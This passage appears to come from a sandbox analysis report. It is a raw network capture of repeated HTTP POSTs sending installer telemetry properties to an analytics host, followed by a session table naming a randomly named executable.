                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.714695930 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 174
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.714848042 CEST174OUTData Raw: 71 74 3d 36 37 38 30 35 39 33 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 55 49 4c 65 76 65 6c 26 76 61 6c 3d 33 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61 76 3d 36 2e 35 2e 37 2e 34
                                                Data Ascii: qt=6780593&t=property&lb=UILevel&val=3&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.854109049 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.855360985 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 183
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.855412960 CEST183OUTData Raw: 71 74 3d 36 37 38 30 37 33 34 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 69 72 74 75 61 6c 4d 65 6d 6f 72 79 26 76 61 6c 3d 36 37 34 32 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61
                                                Data Ascii: qt=6780734&t=property&lb=VirtualMemory&val=6742&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:19.994918108 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:19 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:19.996213913 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 183
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:19.996234894 CEST183OUTData Raw: 71 74 3d 36 37 38 30 38 37 35 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 4d 73 69 4e 54 50 72 6f 64 75 63 74 54 79 70 65 26 76 61 6c 3d 31 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61
                                                Data Ascii: qt=6780875&t=property&lb=MsiNTProductType&val=1&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:20.135318995 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.136507034 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 183
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.136526108 CEST183OUTData Raw: 71 74 3d 36 37 38 31 30 31 35 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 53 65 72 76 69 63 65 50 61 63 6b 4c 65 76 65 6c 26 76 61 6c 3d 30 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37 26 61
                                                Data Ascii: qt=6781015&t=property&lb=ServicePackLevel&val=0&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:20.275909901 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.277035952 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.277092934 CEST185OUTData Raw: 71 74 3d 36 37 38 31 31 35 36 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 50 72 6f 64 75 63 74 4c 61 6e 67 75 61 67 65 26 76 61 6c 3d 31 30 34 36 26 76 3d 33 26 61 69 64 3d 36 36 34 35 30 31 65 64 32 30 61 35 39 61 64 65 34 63 32 33 38 64 35 37
                                                Data Ascii: qt=6781156&t=property&lb=ProductLanguage&val=1046&v=3&aid=664501ed20a59ade4c238d57&av=6.5.7.4&cid=643723AC551666E9AF596F6B2A6F6BAD7DC8601F&sid=%7B15EDF404-6639-418F-86D1-C094DA28F881%7D
                                                May 16, 2024 04:41:20.417790890 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.418941021 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 195
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.558240891 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.559390068 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 192
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.699634075 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.700751066 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 195
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.840188026 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.852502108 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 192
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:20.990972042 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:20 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:20.992151022 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 194
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.132839918 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.134114981 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 210
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.273088932 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.275059938 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 211
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.414822102 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.432512999 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 193
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.571908951 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.573111057 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 207
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.713527918 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.714663982 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 199
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:21.854727983 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:21.855814934 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 201
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.008183956 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:21 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.009416103 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 201
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.148236990 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.149282932 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 203
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.287923098 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.289278030 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 202
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.428570986 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.429749012 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 204
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.569343090 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.570494890 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 204
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.710050106 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.711122990 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 207
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.850832939 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.852271080 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 206
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:22.994971037 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:22 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:22.996254921 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 201
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.135792017 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.137051105 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 208
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.275819063 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.276931047 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 212
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.416615963 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.418211937 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 191
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.557143927 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.558531046 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 183
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.698715925 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.699748039 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 176
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.838516951 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.844733000 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 184
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:23.984416008 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:23 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:23.985655069 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 184
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:24.124808073 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:24 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:24.126142979 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 172
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:24.264904976 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:24 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:24.266132116 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 179
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:24.405625105 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:24 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:24.406838894 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 219
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:24.545455933 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:24 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive
                                                May 16, 2024 04:41:24.547045946 CEST396OUTPOST / HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                                                Host: collect.installeranalytics.com
                                                Content-Length: 181
                                                Cache-Control: no-cache
                                                Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                                                May 16, 2024 04:41:24.693871021 CEST122INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:41:24 GMT
                                                X-Powered-By: Express
                                                Content-Length: 0
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549711194.180.191.36804760C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe
                                                TimestampBytes transferredDirectionData
